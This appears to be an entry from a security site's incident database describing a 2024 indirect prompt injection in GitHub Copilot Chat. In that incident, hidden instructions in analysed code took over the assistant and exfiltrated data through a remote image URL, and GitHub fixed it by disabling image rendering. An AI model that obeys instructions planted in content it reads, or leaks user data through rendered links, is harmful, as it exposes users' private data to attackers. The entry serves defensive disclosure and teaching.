Indirect Prompt InjectionHigh

GitHub Copilot Chat prompt injection to data exfiltration

June 2024  ·  GitHub Copilot Chat

What happened

Hidden instructions in untrusted source code that Copilot analyzed could fully control its responses and exfiltrate data by rendering an image tag whose URL carried stolen data to a remote server.

Root cause

Copilot Chat followed injected instructions from analyzed code and rendered remote images, allowing data to leak via the image-request URL.

Fix / outcome

GitHub mitigated by disabling image rendering in Copilot Chat. (Distinct from the more severe 2025 CamoLeak issue.)

Sources

Embrace The Red

Learn this attack class

This incident is an example of Indirect Prompt Injection. Read the guide, then try it hands-on in the Academy.

Read the guide →Try the challenge

← Back to the Incident Database